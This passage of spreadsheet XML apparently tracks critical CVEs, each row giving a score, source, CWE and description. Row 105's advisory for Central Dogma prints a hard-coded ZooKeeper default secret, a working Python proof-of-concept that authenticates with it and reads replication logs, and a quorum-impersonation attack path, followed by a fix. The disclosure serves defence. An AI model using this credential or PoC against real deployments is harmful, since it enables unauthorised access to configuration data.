      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: restart ssc_expire_umount walk after dropping nfsd_ssc_lock
nfsd4_ssc_expire_umount() walks nn-&gt;nfsd_ssc_mount_list with
list_for_each_entry_safe(ni, tmp, ...).  For each expired entry it
sets nsui_busy = true, drops nfsd_ssc_lock to run mntput() on the
source vfsmount, then reacquires the lock to list_del + kfree the
entry and continue iterating via the macro's saved tmp pointer.
The nsui_busy flag protects the current ni from concurrent
nfsd4_ssc_setup_dul() finders during the lock-drop window, but it
does not pin tmp.  Another nfsd RPC thread that fails its source-
server mount and reaches nfsd4_ssc_cancel_dul() will, during that
same window, take nfsd_ssc_lock, list_del + kfree its own ssc_umount
item, and release the lock.  If that item is the saved tmp of the
expire walk, the next iteration dereferences a freed
nfsd4_ssc_umount_item.
Restart the walk from the head after the mntput() unlock window so
no saved next pointer survives the lock-drop.  The list is bounded
by the number of active inter-server source mounts (typically small)
and the expire delayed-work runs periodically rather than per-IO,
so the restart is cheap.</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89712</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81376</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-693</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11746</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server</t>
        </is>
      </c>
      <c r="M105" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr"/>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
`ZooKeeperReplicationConfig.secret()` silently substitutes the hard-coded constant `"ch4n63m3"` (leetspeak for "change me") whenever the operator omits `replication.secret`. The same secret is wired into both the **client-facing SASL context** and the **quorum/learner SASL contexts** of the embedded ZooKeeper. The constant is in OSS source on GitHub and is discoverable via code search in seconds.
### Three Reinforcing Defects
1. **OSS-public credential** — `DEFAULT_SECRET` is in `line/centraldogma` source.
2. **Silent fallback** — `firstNonNull(convertValue(...), DEFAULT_SECRET)` substitutes the default with no log, no warning, no startup banner. The only sanity check `checkArgument(!secret().isEmpty(), ...)` passes because the getter substitutes the literal before the emptiness check runs.
3. **Dual-purpose secret** — used for both ZK client-port super auth and inter-peer quorum SASL. A single leaked password authenticates against both surfaces.
### Architecture Context (Important)
Central Dogma does **NOT** connect to an external ZooKeeper ensemble. Each replica embeds a `QuorumPeer` (`EmbeddedZooKeeper extends QuorumPeer`) inside its own JVM. The Central Dogma cluster **IS** the ZK ensemble. So the "ZK network" is the inter-replica network of the Central Dogma cluster itself.
### Applicability
| `replication.method` | ZK Started? | Applicable? |
|---|---|---|
| `NONE` (standalone, dev default) | No | **NOT applicable** |
| `ZOOKEEPER` (HA production) | Yes, embedded on every replica | **Fully applicable** — canonical production configuration |
---
## Evidence
**File:** `server/src/main/java/com/linecorp/centraldogma/server/ZooKeeperReplicationConfig.java`
**Branch:** `main` @ commit `d64a5151`
**Line 53** — the constant:
```java
private static final String DEFAULT_SECRET = "ch4n63m3";
```
**Lines 210–215** — the silent fallback:
```java
/**
 * Returns the secret string used for authenticating the ZooKeeper peers.
 */
public String secret() {
    return firstNonNull(convertValue(secret, "replication.secret"), DEFAULT_SECRET);
}
```
---
**File:** `server/src/main/java/com/linecorp/centraldogma/server/internal/replication/ZooKeeperCommandExecutor.java`
**Lines 586–607** — JAAS wiring (same secret on both surfaces):
```java
final String escapedSecret = jaasValueEscaper.escape(cfg.secret());
ImmutableList.of("Server", EmbeddedZooKeeper.SASL_SERVER_LOGIN_CONTEXT).forEach(name -&gt; {
    buf.append(name).append(" {").append(newline);
    buf.append(DigestLoginModule.class.getName()).append(" required").append(newline);
    buf.append("user_super=\"").append(escapedSecret).append("\";").append(newline);
    buf.append("};").append(newline);
});
ImmutableList.of("Client", EmbeddedZooKeeper.SASL_LEARNER_LOGIN_CONTEXT).forEach(name -&gt; {
    buf.append(name).append(" {").append(newline);
    buf.append(DigestLoginModule.class.getName()).append(" required").append(newline);
    buf.append("username=\"super\"").append(newline);
    buf.append("password=\"").append(escapedSecret).append("\";").append(newline);
    buf.append("};").append(newline);
});
```
---
**File:** `server/src/main/java/com/linecorp/centraldogma/server/internal/replication/EmbeddedZooKeeper.java`
**Line 44** — proves CD embeds the ZK server:
```java
final class EmbeddedZooKeeper extends QuorumPeer {
```
**Lines 213–220** — client port binding (loopback only):
```java
private static ServerCnxnFactory createCnxnFactory(QuorumPeerConfig zkCfg) throws IOException {
    final InetSocketAddress bindAddr = zkCfg.getClientPortAddress();
    final ServerCnxnFactory cnxnFactory = ServerCnxnFactory.createFactory();
    // Listen only on 127.0.0.1 because we do not want to expose ZooKeeper to others.
    cnxnFactory.configure(new InetSocketAddress("127.0.0.1", bindAddr != null ? bindAddr.getPort() : 0),
                          zkCfg.getMaxClientCnxns());
    return cnxnFactory;
}
```
&gt; Quorum/election ports are **NOT** loopback-bound — they bind to `replication.servers[].host` as configured, exposed on the inter-replica network.
---
## PoC
Two attack surfaces, two scenarios. **Surface A** (client port, same-host) is implemented as a working read-only PoC. **Surface B** (quorum-port peer impersonation) is documented but intentionally not weaponized.
### Surface A — Same-Host Client Port (Loopback) PoC
Python + kazoo + pure-sasl. Authenticates as `super` over SASL DIGEST-MD5 with the leaked secret and reads the full Central Dogma replication log. Hardcoded to `127.0.0.1`, read-only, prints first 5 entries.
```python
#!/usr/bin/env python3
"""
C3 PoC -- ZooKeeper default-secret takeover (read-only, loopback only).
Demonstrates that a Central Dogma instance launched with a
ZooKeeper-replicated configuration but without `replication.secret` set
exposes its embedded ZooKeeper to anyone with local-host access, using
the well-known credential `super / ch4n63m3`.
SAFETY:
  * Hardcoded to 127.0.0.1. Refuses any other target.
  * Read-only. No writes are issued. No nodes are deleted.
  * Limits how much data it prints (first MAX_LOGS entries).
"""
from __future__ import annotations
import sys
from kazoo.client import KazooClient
from kazoo.exceptions import NoNodeError
HOST = "127.0.0.1"
DEFAULT_PORT = 2381
DEFAULT_USER = "super"
DEFAULT_SECRET = "ch4n63m3"  # ZooKeeperReplicationConfig.DEFAULT_SECRET
MAX_LOGS = 5
def main() -&gt; int:
    port = int(sys.argv[1]) if len(sys.argv) &gt; 1 else DEFAULT_PORT
    if HOST != "127.0.0.1":
        print("Refusing to run against non-loopback host.", file=sys.stderr)
        return 2
    zk = KazooClient(
        hosts=f"{HOST}:{port}",
        sasl_options={
            "mechanism": "DIGEST-MD5",
            "username": DEFAULT_USER,
            "password": DEFAULT_SECRET,
        },
        read_only=True,
        timeout=5.0,
    )
    try:
        zk.start(timeout=5)
    except Exception as exc:
        print(f"[!] Could not reach {HOST}:{port} -- {exc}", file=sys.stderr)
        return 1
    try:
        try:
            log_children = zk.get_children("/dogma/logs")
        except NoNodeError:
            print("[i] /dogma/logs not present -- is replication actually enabled?")
            log_children = []
        print(f"[+] Authenticated as '{DEFAULT_USER}' with default secret.")
        print(f"[+] /dogma/logs has {len(log_children)} entries.")
        for child in sorted(log_children)[:MAX_LOGS]:
            path = f"/dogma/logs/{child}"
            try:
                data, stat = zk.get(path)
            except NoNodeError:
                continue
            preview = data[:120].decode("utf-8", errors="replace") if data else ""
            print(f"  - {path}  ({stat.dataLength} bytes)  preview={preview!r}")
        try:
            block_children = zk.get_children("/dogma/log_blocks")
            print(f"[+] /dogma/log_blocks has {len(block_children)} entries.")
        except NoNodeError:
            pass
        print(
            f"[!] ZK cluster compromised: read {len(log_children)} log entries "
            "with default credentials."
        )
        return 0
    finally:
        zk.stop()
        zk.close()
if __name__ == "__main__":
    raise SystemExit(main())
```
**Dependencies** (`requirements.txt`): `kazoo`, `pure-sasl`
**Setup:** edit `dist/src/conf/dogma.json` to enable replication **WITHOUT** setting secret:
```json
{
  "replication": {
    "method": "ZOOKEEPER",
    "serverId": 1,
    "servers": {
      "1": { "host": "127.0.0.1", "quorumPort": 2382, "electionPort": 2383, "clientPort": 2381 }
    }
  }
}
```
&gt; **Note:** `replication.secret` is **INTENTIONALLY** omitted. Launch with `./gradlew :dist:startup`.
**Run:**
```bash
python3 zk_takeover.py 2381
```
**Expected output (VULNERABLE):**
```
[+] Authenticated as 'super' with default secret.
[+] /dogma/logs has 14 entries.
  - /dogma/logs/0000000001  (412 bytes)  preview="{"size":..."
  - /dogma/logs/0000000002  (508 bytes)  preview="{"size":..."
  ...
[+] /dogma/log_blocks has 14 entries.
[!] ZK cluster compromised: read 14 log entries with default credentials.
```
After the patch (fail-closed on null/placeholder secret), Central Dogma **refuses to start at all** with this config.
### Surface B — Inter-Replica Quorum-Port Peer Impersonation (Documented, Not Weaponized)
Quorum/election ports bind to the configured `replication.servers[].host`, **NOT** to loopback. In typical HA deployments (multi-DC, K8s with NetworkPolicy gaps, shared VPC), these ports are reachable from peer workloads.
**Attack path:**
1. Attacker reaches the quorum port of any Central Dogma replica from a co-located workload (same K8s namespace, same VLAN, etc.).
2. Attacker spins up their own Apache ZooKeeper process configured with:
   - matching `serverId` (or a new one if the `QuorumVerifier` allows dynamic membership)
   - JAAS `QuorumLearner` / `QuorumServer` digest contexts using `super / ch4n63m3`
   - `quorumServerSaslAuthRequired=true`, `quorumLearnerSaslAuthRequired=true`
3. Attacker's process joins the quorum as a learner. SASL handshake passes because the secret matches.
4. Attacker now receives every replicated `Command`, can attempt to win leader election, and once in the cluster can write to `/dogma/logs/` directly — which `ZooKeeperCommandExecutor.replayLogs()` will deserialize and execute on every legitimate replica.
**Dangerous Commands the attacker can replay across the cluster** (from `Command.java:46-68`):
| Command | Impact |
|---|---|
| `PURGE_PROJECT` | Permanent deletion |
| `ROTATE_SESSION_MASTER_KEY` / `REWRAP_ALL_KEYS` | Pivot encryption-at-rest layer to attacker-controlled keys |
| `UPDATE_SERVER_STATUS` (read-only / maintenance) | Denial of Service |
| `CREATE_SESSION` with crafted user info | Session forgery |
&gt; This PoC is **intentionally NOT shipped as runnable code**. It is closer to an attack tool than a verification artifact, and the audit's purpose is to drive the fix, not to provide weaponization. The Surface A PoC plus this documentation are sufficient to motivate remediation.
---
## Impact
### Threat Model (Realistic for LINE Corporate Deployment)
- Multi-tenant K8s where Central Dogma StatefulSet shares Pod network with other workloads
- Or shared VPC/VLAN where the inter-replica quorum traffic is reachable from co-tenant hosts
- Or single-tenant cluster where any sidecar/co-located process has loopback access (Surface A)
### What an Attacker Gains with the Leaked Secret
1. **Read the full replication log.** `/dogma/logs` + `/dogma/log_blocks` contain the Zstd-compressed `ReplicationLog` entries — every commit, every `PUSH` payload (with file contents), every credential mutation, every session/master-key management command. Includes `CREATE_SESSION_MASTER_KEY`, `ROTATE_SESSION_MASTER_KEY`, `REWRAP_ALL_KEYS`. Reading this effectively renders the encryption-at-rest layer moot because the master-key management commands themselves traverse ZK.
2. **Write to the replication log (Surface B).** Forged `LogMeta` + `log_blocks` entries are auto-replayed by `ZooKeeperCommandExecutor.replayLogs()` on every replica. The attacker gains **arbitrary Command execution on the entire cluster**.
3. **Join the quorum as a fake peer (Surface B).** With the secret, an attacker reachable on the inter-replica network can pose as a legitimate replica, receive all future commits in real time, and potentially win leadership.
**Scope is Changed** (CVSS) because ZK is a separate security authority from Central Dogma's HTTP API, and the impact propagates to every microservice consuming Central Dogma configuration via watch.
**Incident recovery cost:** secret rotation alone is insufficient. Every `Command` that traversed ZK during the compromise window must be audited. If master-key rotation commands were issued, all encryption-at-rest data must be re-encrypted. This is an **extremely high-blast-radius failure mode** for a single missing config knob.
**Historical analogue:** this is the same anti-pattern that caused Mirai (2016, IoT default credentials), pre-2018 unauthenticated Hadoop YARN clusters, and the recurring ZK / Elasticsearch / MongoDB internet-exposed-without-auth incidents 2018–2024.
---
## How to Fix
**Remove the default constant. Fail closed when `replication.secret` is missing or matches the legacy placeholder.**
```java
// ZooKeeperReplicationConfig.java
// REMOVE: private static final String DEFAULT_SECRET = "ch4n63m3";
@JsonCreator
ZooKeeperReplicationConfig(/* ...unchanged params... */
                           @JsonProperty("secret") @Nullable String secret,
                           /* ... */) {
    // ...
    final String resolved = convertValue(secret, "replication.secret");
    checkArgument(resolved != null &amp;&amp; !resolved.isEmpty(),
                  "'replication.secret' must be set (and non-empty) when " +
                  "ZooKeeper replication is enabled. There is no default; " +
                  "generate a long random string and configure it on every " +
                  "replica.");
    // Reject the historical placeholder explicitly so existing config files
    // copy-pasted from old tutorials fail loudly instead of silently.
    checkArgument(!"ch4n63m3".equals(resolved),
                  "'replication.secret' is set to the legacy placeholder " +
                  "value. Replace it with a fresh random secret " +
                  "(`openssl rand -hex 32`).");
    // Optional: enforce minimum length (32 chars) and reject obvious placeholders.
    checkArgument(resolved.length() &gt;= 32,
                  "'replication.secret' must be at least 32 characters. " +
                  "Use `openssl rand -hex 32` to generate one.");
    this.secret = resolved;
}
public String secret() {
    return secret;  // never null at this point
}
```</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11746</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38056</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability exists in the iDirect iQ200 VSAT terminal running firmware 23.0.1.0. The iQ200 is a rackmount satellite modem deployed across oil and gas, maritime, defense, and remote infrastructure as the primary, and often sole communications link for offshore rigs, vessels, and remote sites. Important context: the device ships from the factory with a pre-configured low-privilege local user account. This account is intended for field technicians who need shell access for maintenance and diagnostics but should not have full administrative control over the device. This built-in account provides the initial access required to exploit this vulnerability. No additional credentials need to be obtained or brute-forced.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38056</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61410</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Missing Authorization vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution. This vulnerability is considered critical because it allows an attacker to execute commands remotely on a target system by sending a specially crafted request to the application, bypassing intended restrictions on code execution.Dell recommends customers to upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61410</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82466</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>Rodauth before 2.46.0 contains an authentication bypass vulnerability in the webauthn_login route that allows logged-in users to authenticate as any other account. Attackers can exploit improper account resolution logic that falls back to session account identifiers instead of validating the credential binding to complete authentication as arbitrary users.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82466</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86151</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Tenda CP3 27.5.57.101. The affected element is the function sub_2F77E8 of the file Apis/system.c of the component Network Configuration Management. Performing a manipulation results in os command injection. The attack may be initiated remotely.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86151</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54072</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>Authorizer is an open-source, self-hostable authentication and authorization server. Prior to version 2.2.1, the `/authorize` endpoint accepts any `redirect_uri` without validating it against `AllowedOrigins`. When `response_type=token` or `response_type=id_token`, the server appends `access_token`, `id_token`, and `refresh_token` as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required `client_id` from the public `/graphql?query={meta{client_id}}` endpoint. A partial fix was applied in v2.0.1 to other handlers (`oauth_login`, `verify_email`, `magic_link_login`, `forgot_password`, `invite_members`, `oauth_callback`) but `/authorize` was not included. Version 2.2.1 contains a more complete fix.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54072</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72709</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>SPIP before version 4.4.18 contains a missing authorization vulnerability in sensitive actions under ecrire/action/ that allows unauthenticated attackers to invoke privileged actions by supplying only a valid CSRF nonce without any server-side permission check. Attackers can bypass template-level authorization guards through direct HTTP requests to invoke actions such as editer_auteur, enabling arbitrary account password rewrites including administrator accounts and resulting in full account takeover.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72709</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72710</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains a mass assignment vulnerability in the editer_objet action that allows unauthenticated attackers to write arbitrary rows to any SQL table lacking a champs_editables allowlist by supplying an attacker-controlled arg parameter resolving to internal database tables. Attackers can insert a malicious row into the spip_jobs queue with a controlled PHP function and arguments, which is then dynamically executed when the cron processes the queue, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72710</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
